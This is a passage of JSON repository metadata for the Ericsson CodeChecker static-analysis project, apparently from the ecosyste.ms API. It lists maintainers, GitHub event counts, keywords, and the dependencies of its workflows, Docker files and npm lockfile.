ount":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/csordasmarton"}],"active_maintainers":[{"login":"gulyasgergely902","count":39,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"gamesh411","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"dkrupp","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"noraz31","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"cservakt","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"feyruzb","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"xb058t","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"barnabasdomozi","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"Szelethus","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"stt08","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"whisperity","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"}]},"events":{"total":{"ForkEvent":53,"CreateEvent":48,"CommitCommentEvent":1,"ReleaseEvent":12,"IssuesEvent":92,"WatchEvent":201,"DeleteEvent":36,"MemberEvent":2,"IssueCommentEvent":188,"PushEvent":162,"PullRequestReviewCommentEvent":260,"PullRequestReviewEvent":419,"PullRequestEvent":324},"last_year":{"ForkEvent":53,"CreateEvent":48,"CommitCommentEvent":1,"ReleaseEvent":12,"IssuesEvent":92,"WatchEvent":201,"DeleteEvent":36,"MemberEvent":2,"IssueCommentEvent":188,"PushEvent":162,"PullRequestReviewCommentEvent":260,"PullRequestReviewEvent":419,"PullRequestEvent":324}},"keywords":["analysis","c","clang","clang-tidy","codechecker","cpp","database","defects","docker","linux","llvm","macosx","objective-c","results-viewer","static-analysis","static-analyzer","static-analyzers","vue"],"dependencies":[{"ecosystem":"actions","filepath":".github/workflows/config_coverage.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T16:46:43.681Z","updated_at":"2023-09-22T16:46:43.681Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/.github/workflows/config_coverage.yml","dependencies":[{"id":13878385651,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":13878385652,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/docker.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T16:46:44.687Z","updated_at":"2023-09-22T16:46:44.687Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/.github/workflows/docker.yml","dependencies":[{"id":13878385659,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":13878385660,"package_name":"docker/setup-buildx-action","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":13878385661,"package_name":"docker/login-action","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":13878385662,"package_name":"docker/build-push-action","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/pypi.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T16:46:46.096Z","updated_at":"2023-09-22T16:46:46.096Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/.github/workflows/pypi.yml","dependencies":[{"id":13878385664,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":13878385665,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":13878385666,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":13878385667,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"master","direct":true,"kind":"composite","optional":false},{"id":13878385668,"package_name":"actions/download-artifact","ecosystem":"actions","requirements":"master","direct":true,"kind":"composite","optional":false},{"id":13878385669,"package_name":"pypa/gh-action-pypi-publish","ecosystem":"actions","requirements":"release/v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/snap.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T16:46:46.903Z","updated_at":"2023-09-22T16:46:46.903Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/.github/workflows/snap.yml","dependencies":[{"id":13878385682,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":13878385683,"package_name":"snapcore/action-build","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":13878385684,"package_name":"snapcore/action-publish","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/test.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T16:46:48.218Z","updated_at":"2023-09-22T16:46:48.218Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/.github/workflows/test.yml","dependencies":[{"id":13878385700,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":13878385701,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":13878385702,"package_name":"abhinavsingh/setup-bazel","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":13878385703,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":13878385704,"package_name":"postgres","ecosystem":"actions","requirements":"*","direct":true,"kind":"docker","optional":false}]},{"ecosystem":"docker","filepath":"web/docker/Dockerfile","sha":null,"kind":"manifest","created_at":"2023-09-22T16:46:50.221Z","updated_at":"2023-09-22T16:46:50.221Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/docker/Dockerfile","dependencies":[{"id":13878385721,"package_name":"python","ecosystem":"docker","requirements":"3.9.7-slim-buster","direct":true,"kind":"build","optional":false}]},{"ecosystem":"docker","filepath":"web/docker/services/docker-compose.psql.auth.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T16:46:51.423Z","updated_at":"2023-09-22T16:46:51.423Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/docker/services/docker-compose.psql.auth.yml","dependencies":[{"id":13878385730,"package_name":"postgres","ecosystem":"docker","requirements":"12.2-alpine","direct":true,"kind":"runtime","optional":false},{"id":13878385731,"package_name":"codechecker/codechecker-web","ecosystem":"docker","requirements":"latest","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"docker","filepath":"web/docker/services/docker-compose.psql.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T16:46:52.865Z","updated_at":"2023-09-22T16:46:52.865Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/docker/services/docker-compose.psql.yml","dependencies":[{"id":13878387400,"package_name":"postgres","ecosystem":"docker","requirements":"12.2-alpine","direct":true,"kind":"runtime","optional":false},{"id":13878387401,"package_name":"codechecker/codechecker-web","ecosystem":"docker","requirements":"latest","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"docker","filepath":"web/docker/services/docker-compose.sqlite.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:03.696Z","updated_at":"2023-09-22T16:47:03.696Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/docker/services/docker-compose.sqlite.yml","dependencies":[{"id":13878387436,"package_name":"codechecker/codechecker-web","ecosystem":"docker","requirements":"latest","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"docker","filepath":"web/docker/services/docker-compose.swarm.yml","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:05.303Z","updated_at":"2023-09-22T16:47:05.303Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/docker/services/docker-compose.swarm.yml","dependencies":[{"id":13878387568,"package_name":"postgres","ecosystem":"docker","requirements":"12.2-alpine","direct":true,"kind":"runtime","optional":false},{"id":13878387569,"package_name":"codechecker/codechecker-web","ecosystem":"docker","requirements":"latest","direct":true,"kind":"runtime","optional":false},{"id":13878387570,"package_name":"nginx","ecosystem":"docker","requirements":"1.17.10-alpine","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"web/api/js/codechecker-api-node/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:06.363Z","updated_at":"2023-09-22T16:47:06.363Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/api/js/codechecker-api-node/package.json","dependencies":[{"id":13878387678,"package_name":"thrift","ecosystem":"npm","requirements":"0.13.0-hotfix.1","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"web/server/vue-cli/package-lock.json","sha":null,"kind":"lockfile","created_at":"2023-09-22T16:47:08.057Z","updated_at":"2023-09-22T16:47:08.057Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/server/vue-cli/package-lock.json","dependencies":[{"id":13878387689,"package_name":"@babel/cli","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387690,"package_name":"@babel/code-frame","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387691,"package_name":"@babel/compat-data","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387692,"package_name":"@babel/core","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387693,"package_name":"debug","ecosystem":"npm","requirements":"4.3.3","direct":false,"kind":"development","optional":false},{"id":13878387694,"package_name":"ms","ecosystem":"npm","requirements":"2.1.2","direct":false,"kind":"development","optional":false},{"id":13878387695,"package_name":"semver","ecosystem":"npm","requirements":"6.3.0","direct":false,"kind":"development","optional":false},{"id":13878387696,"package_name":"@babel/generator","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387697,"package_name":"@babel/helper-annotate-as-pure","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387698,"package_name":"@babel/helper-builder-binary-assignment-operator-visitor","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387699,"package_name":"@babel/helper-compilation-targets","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387700,"package_name":"@babel/helper-create-class-features-plugin","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387701,"package_name":"@babel/helper-create-regexp-features-plugin","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387702,"package_name":"@babel/helper-define-polyfill-provider","ecosystem":"npm","requirements":"0.3.1","direct":false,"kind":"development","optional":false},{"id":13878387703,"package_name":"@babel/helper-environment-visitor","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387704,"package_name":"@babel/helper-explode-assignable-expression","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387705,"package_name":"@babel/helper-function-name","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387706,"package_name":"@babel/helper-get-function-arity","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387707,"package_name":"@babel/helper-hoist-variables","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387708,"package_name":"@babel/helper-member-expression-to-functions","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387709,"package_name":"@babel/helper-module-imports","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387710,"package_name":"@babel/helper-module-transforms","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387711,"package_name":"@babel/helper-optimise-call-expression","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387712,"package_name":"@babel/helper-plugin-utils","ecosystem":"npm","requirements":"7.17.12","direct":false,"kind":"development","optional":false},{"id":13878387713,"package_name":"@babel/helper-remap-async-to-generator","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387714,"package_name":"@babel/helper-replace-supers","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387715,"package_name":"@babel/helper-simple-access","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387716,"package_name":"@babel/helper-skip-transparent-expression-wrappers","ecosystem":"npm","requirements":"7.16.0","direct":false,"kind":"development","optional":false},{"id":13878387717,"package_name":"@babel/helper-split-export-declaration","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387718,"package_name":"@babel/helper-validator-identifier","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387719,"package_name":"@babel/helper-validator-option","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387720,"package_name":"@babel/helper-wrap-function","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387721,"package_name":"@babel/helpers","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387722,"package_name":"@babel/highlight","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387723,"package_name":"@babel/parser","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387724,"package_name":"@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387725,"package_name":"@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387726,"package_name":"@babel/plugin-proposal-async-generator-functions","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387727,"package_name":"@babel/plugin-proposal-class-properties","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387728,"package_name":"@babel/plugin-proposal-class-static-block","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387729,"package_name":"@babel/plugin-proposal-dynamic-import","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387730,"package_name":"@babel/plugin-proposal-export-namespace-from","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387731,"package_name":"@babel/plugin-proposal-json-strings","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387732,"package_name":"@babel/plugin-proposal-logical-assignment-operators","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387733,"package_name":"@babel/plugin-proposal-nullish-coalescing-operator","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387734,"package_name":"@babel/plugin-proposal-numeric-separator","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387735,"package_name":"@babel/plugin-proposal-object-rest-spread","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387736,"package_name":"@babel/plugin-proposal-optional-catch-binding","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387737,"package_name":"@babel/plugin-proposal-optional-chaining","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387738,"package_name":"@babel/plugin-proposal-private-methods","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387739,"package_name":"@babel/plugin-proposal-private-property-in-object","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387740,"package_name":"@babel/plugin-proposal-unicode-property-regex","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387741,"package_name":"@babel/plugin-syntax-async-generators","ecosystem":"npm","requirements":"7.8.4","direct":false,"kind":"development","optional":false},{"id":13878387742,"package_name":"@babel/plugin-syntax-bigint","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":13878387743,"package_name":"@babel/plugin-syntax-class-properties","ecosystem":"npm","requirements":"7.12.13","direct":false,"kind":"development","optional":false},{"id":13878387744,"package_name":"@babel/plugin-syntax-class-static-block","ecosystem":"npm","requirements":"7.14.5","direct":false,"kind":"development","optional":false},{"id":13878387745,"package_name":"@babel/plugin-syntax-dynamic-import","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":13878387746,"package_name":"@babel/plugin-syntax-export-namespace-from","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":13878387747,"package_name":"@babel/plugin-syntax-import-meta","ecosystem":"npm","requirements":"7.10.4","direct":false,"kind":"development","optional":false},{"id":13878387748,"package_name":"@babel/plugin-syntax-json-strings","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":13878387818,"package_name":"supports-color","ecosystem":"npm","requirements":"7.2.0","direct":false,"kind":"development","optional":false},{"id":13878387749,"package_name":"@babel/plugin-syntax-logical-assignment-operators","ecosystem":"npm","requirements":"7.10.4","direct":false,"kind":"development","optional":false},{"id":13878387750,"package_name":"@babel/plugin-syntax-nullish-coalescing-operator","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":13878387751,"package_name":"@babel/plugin-syntax-numeric-separator","ecosystem":"npm","requirements":"7.10.4","direct":false,"kind":"development","optional":false},{"id":13878387752,"package_name":"@babel/plugin-syntax-object-rest-spread","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":13878387753,"package_name":"@babel/plugin-syntax-optional-catch-binding","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":13878387754,"package_name":"@babel/plugin-syntax-optional-chaining","ecosystem":"npm","requirements":"7.8.3","direct":false,"kind":"development","optional":false},{"id":13878387755,"package_name":"@babel/plugin-syntax-private-property-in-object","ecosystem":"npm","requirements":"7.14.5","direct":false,"kind":"development","optional":false},{"id":13878387756,"package_name":"@babel/plugin-syntax-top-level-await","ecosystem":"npm","requirements":"7.14.5","direct":false,"kind":"development","optional":false},{"id":13878387757,"package_name":"@babel/plugin-syntax-typescript","ecosystem":"npm","requirements":"7.17.12","direct":false,"kind":"development","optional":false},{"id":13878387758,"package_name":"@babel/plugin-transform-arrow-functions","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387759,"package_name":"@babel/plugin-transform-async-to-generator","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387760,"package_name":"@babel/plugin-transform-block-scoped-functions","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387761,"package_name":"@babel/plugin-transform-block-scoping","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387762,"package_name":"@babel/plugin-transform-classes","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387763,"package_name":"@babel/plugin-transform-computed-properties","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387764,"package_name":"@babel/plugin-transform-destructuring","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387765,"package_name":"@babel/plugin-transform-dotall-regex","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387766,"package_name":"@babel/plugin-transform-duplicate-keys","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387767,"package_name":"@babel/plugin-transform-exponentiation-operator","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387768,"package_name":"@babel/plugin-transform-for-of","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387769,"package_name":"@babel/plugin-transform-function-name","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387770,"package_name":"@babel/plugin-transform-literals","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387771,"package_name":"@babel/plugin-transform-member-expression-literals","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387772,"package_name":"@babel/plugin-transform-modules-amd","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387773,"package_name":"@babel/plugin-transform-modules-commonjs","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387774,"package_name":"@babel/plugin-transform-modules-systemjs","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387775,"package_name":"@babel/plugin-transform-modules-umd","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387776,"package_name":"@babel/plugin-transform-named-capturing-groups-regex","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387777,"package_name":"@babel/plugin-transform-new-target","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387778,"package_name":"@babel/plugin-transform-object-super","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387779,"package_name":"@babel/plugin-transform-parameters","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387780,"package_name":"@babel/plugin-transform-property-literals","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387781,"package_name":"@babel/plugin-transform-regenerator","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387782,"package_name":"@babel/plugin-transform-reserved-words","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387783,"package_name":"@babel/plugin-transform-shorthand-properties","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387784,"package_name":"@babel/plugin-transform-spread","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387785,"package_name":"@babel/plugin-transform-sticky-regex","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387786,"package_name":"@babel/plugin-transform-template-literals","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387787,"package_name":"@babel/plugin-transform-typeof-symbol","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387788,"package_name":"@babel/plugin-transform-unicode-escapes","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387789,"package_name":"@babel/plugin-transform-unicode-regex","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387790,"package_name":"@babel/preset-env","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387791,"package_name":"@babel/preset-modules","ecosystem":"npm","requirements":"0.1.5","direct":false,"kind":"development","optional":false},{"id":13878387792,"package_name":"@babel/runtime","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387793,"package_name":"@babel/template","ecosystem":"npm","requirements":"7.16.7","direct":false,"kind":"development","optional":false},{"id":13878387794,"package_name":"@babel/traverse","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387795,"package_name":"debug","ecosystem":"npm","requirements":"4.1.1","direct":false,"kind":"development","optional":false},{"id":13878387796,"package_name":"@babel/types","ecosystem":"npm","requirements":"7.16.8","direct":false,"kind":"development","optional":false},{"id":13878387797,"package_name":"@bcoe/v8-coverage","ecosystem":"npm","requirements":"0.2.3","direct":false,"kind":"development","optional":false},{"id":13878387798,"package_name":"@discoveryjs/json-ext","ecosystem":"npm","requirements":"0.5.6","direct":false,"kind":"development","optional":false},{"id":13878387799,"package_name":"@eslint/eslintrc","ecosystem":"npm","requirements":"1.0.5","direct":false,"kind":"development","optional":false},{"id":13878387800,"package_name":"argparse","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878387801,"package_name":"globals","ecosystem":"npm","requirements":"13.12.0","direct":false,"kind":"development","optional":false},{"id":13878387802,"package_name":"ignore","ecosystem":"npm","requirements":"4.0.6","direct":false,"kind":"development","optional":false},{"id":13878387803,"package_name":"js-yaml","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":13878387804,"package_name":"type-fest","ecosystem":"npm","requirements":"0.20.2","direct":false,"kind":"development","optional":false},{"id":13878387805,"package_name":"@hapi/hoek","ecosystem":"npm","requirements":"9.2.1","direct":false,"kind":"development","optional":false},{"id":13878387806,"package_name":"@hapi/topo","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":13878387807,"package_name":"@humanwhocodes/config-array","ecosystem":"npm","requirements":"0.9.2","direct":false,"kind":"development","optional":false},{"id":13878387808,"package_name":"@humanwhocodes/object-schema","ecosystem":"npm","requirements":"1.2.1","direct":false,"kind":"development","optional":false},{"id":13878387809,"package_name":"@istanbuljs/load-nyc-config","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":13878387810,"package_name":"@istanbuljs/schema","ecosystem":"npm","requirements":"0.1.3","direct":false,"kind":"development","optional":false},{"id":13878387811,"package_name":"@jest/console","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387812,"package_name":"ansi-styles","ecosystem":"npm","requirements":"4.3.0","direct":false,"kind":"development","optional":false},{"id":13878387813,"package_name":"chalk","ecosystem":"npm","requirements":"4.1.2","direct":false,"kind":"development","optional":false},{"id":13878387814,"package_name":"color-convert","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878387815,"package_name":"color-name","ecosystem":"npm","requirements":"1.1.4","direct":false,"kind":"development","optional":false},{"id":13878387816,"package_name":"has-flag","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878387817,"package_name":"slash","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878387819,"package_name":"@jest/core","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387820,"package_name":"ci-info","ecosystem":"npm","requirements":"3.3.2","direct":false,"kind":"development","optional":false},{"id":13878387821,"package_name":"pretty-format","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387822,"package_name":"ansi-styles","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":13878387823,"package_name":"react-is","ecosystem":"npm","requirements":"18.2.0","direct":false,"kind":"development","optional":false},{"id":13878387824,"package_name":"@jest/environment","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387825,"package_name":"@jest/expect","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387826,"package_name":"@jest/expect-utils","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387827,"package_name":"jest-get-type","ecosystem":"npm","requirements":"28.0.2","direct":false,"kind":"development","optional":false},{"id":13878387828,"package_name":"@jest/fake-timers","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387829,"package_name":"@jest/globals","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387830,"package_name":"@jest/reporters","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387831,"package_name":"jest-worker","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387832,"package_name":"supports-color","ecosystem":"npm","requirements":"8.1.1","direct":false,"kind":"development","optional":false},{"id":13878387833,"package_name":"@jest/schemas","ecosystem":"npm","requirements":"28.0.2","direct":false,"kind":"development","optional":false},{"id":13878387834,"package_name":"@jest/source-map","ecosystem":"npm","requirements":"28.0.2","direct":false,"kind":"development","optional":false},{"id":13878387835,"package_name":"@jest/test-result","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387836,"package_name":"@jest/test-sequencer","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387837,"package_name":"@jest/transform","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387838,"package_name":"@jest/types","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387839,"package_name":"@jridgewell/resolve-uri","ecosystem":"npm","requirements":"3.0.7","direct":false,"kind":"development","optional":false},{"id":13878387840,"package_name":"@jridgewell/sourcemap-codec","ecosystem":"npm","requirements":"1.4.13","direct":false,"kind":"development","optional":false},{"id":13878387841,"package_name":"@jridgewell/trace-mapping","ecosystem":"npm","requirements":"0.3.13","direct":false,"kind":"development","optional":false},{"id":13878387842,"package_name":"@mdi/font","ecosystem":"npm","requirements":"6.5.95","direct":false,"kind":"runtime","optional":false},{"id":13878387843,"package_name":"@nicolo-ribaudo/chokidar-2","ecosystem":"npm","requirements":"2.1.8-no-fsevents.3","direct":false,"kind":"development","optional":false},{"id":13878387844,"package_name":